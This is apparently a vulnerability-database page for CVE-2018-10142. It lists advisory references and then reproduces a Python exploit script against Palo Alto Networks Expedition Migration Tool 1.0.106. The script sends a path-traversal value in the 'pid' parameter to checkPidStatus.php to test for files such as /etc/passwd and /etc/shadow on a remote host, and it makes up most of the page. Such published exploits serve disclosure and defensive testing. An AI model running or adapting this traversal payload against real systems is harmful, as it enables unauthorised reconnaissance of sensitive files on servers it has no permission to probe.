| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| The vulnerability of the Palo Alto Networks Expedition configuration migration software lies in its authentication procedures’ deficiencies, which allow attackers to gain access to protected information. | 10 Jan 201900:00 | – | bdu_fstec | |
| Palo Alto Expedition Expedition Information Disclosure Vulnerability | 28 Nov 201800:00 | – | cnvd | |
| CVE-2018-10142 | 27 Nov 201821:00 | – | cve | |
| CVE-2018-10142 | 27 Nov 201821:00 | – | cvelist | |
| EUVD-2018-2220 | 7 Oct 202500:30 | – | euvd | |
| CVE-2018-10142 | 27 Nov 201820:29 | – | nvd | |
| CVE-2018-10142 | 27 Nov 201820:29 | – | osv | |
| Information Disclosure in Expedition Migration Tool | 20 Nov 201823:10 | – | paloalto | |
| Information Disclosure in Expedition Migration Tool | 20 Nov 201823:10 | – | paloalto | |
| Design/Logic Flaw | 27 Nov 201820:29 | – | prion |
# Exploit Title: PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure
# Exploit Author: paragonsec @ Critical Start
# Vendor Homepage: https://live.paloaltonetworks.com/t5/Expedition-Migration-Tool/ct-p/migration_tool
# Software Link: https://paloaltonetworks.app.box.com/s/davuvo65k727nm7feuug0d783zo6fjx8
# Version: 1.0.106
# Tested on: Linux
# CVE : 2018-10142
#!/usr/bin/env python
import argparse
import requests
import sys
import collections
#Colors
OKRED = '\033[91m'
OKGREEN = '\033[92m'
ENDC = '\033[0m'
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--file', help = 'File to check (e.g /etc/passwd, /etc/shadow)')
args = parser.parse_args()
# Check to ensure at least one argument has been passed
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
rhost = args.rhost
rfile = args.file
exploit_url = "http://" + rhost + "/API/process/checkPidStatus.php"
headers = [
('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
('Accept', 'application/json, text/javascript, */*; q=0.01'),
('Accept-Language', 'en-US,en;q=0.5'),
('Accept-Encoding', 'gzip, deflate'),
('Connection', 'close')
]
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
# Setting up GET body parameters
body = "pid=/../" + rfile
print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)")
print(OKGREEN + "CVE: " + ENDC + "2018-10142")
print(OKGREEN + "Description: " + ENDC + "Information Disclosure in Expedition Migration Tool")
print(OKGREEN + "Vuln Versions: " + ENDC + "< 1.0.107\n")
print(OKGREEN + "[+]" + ENDC + "Running exploit...")
s = requests.Session()
req = requests.post(exploit_url, headers=headers, data=body)
if "false" not in req.text:
print(OKGREEN + "[+]" + ENDC + "Exploit worked! " + rfile + " exists!\n")
else:
print(OKRED + "[!]" + ENDC + "File " + rfile + " does not exist!\n")
# 0day.today [2019-02-25] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation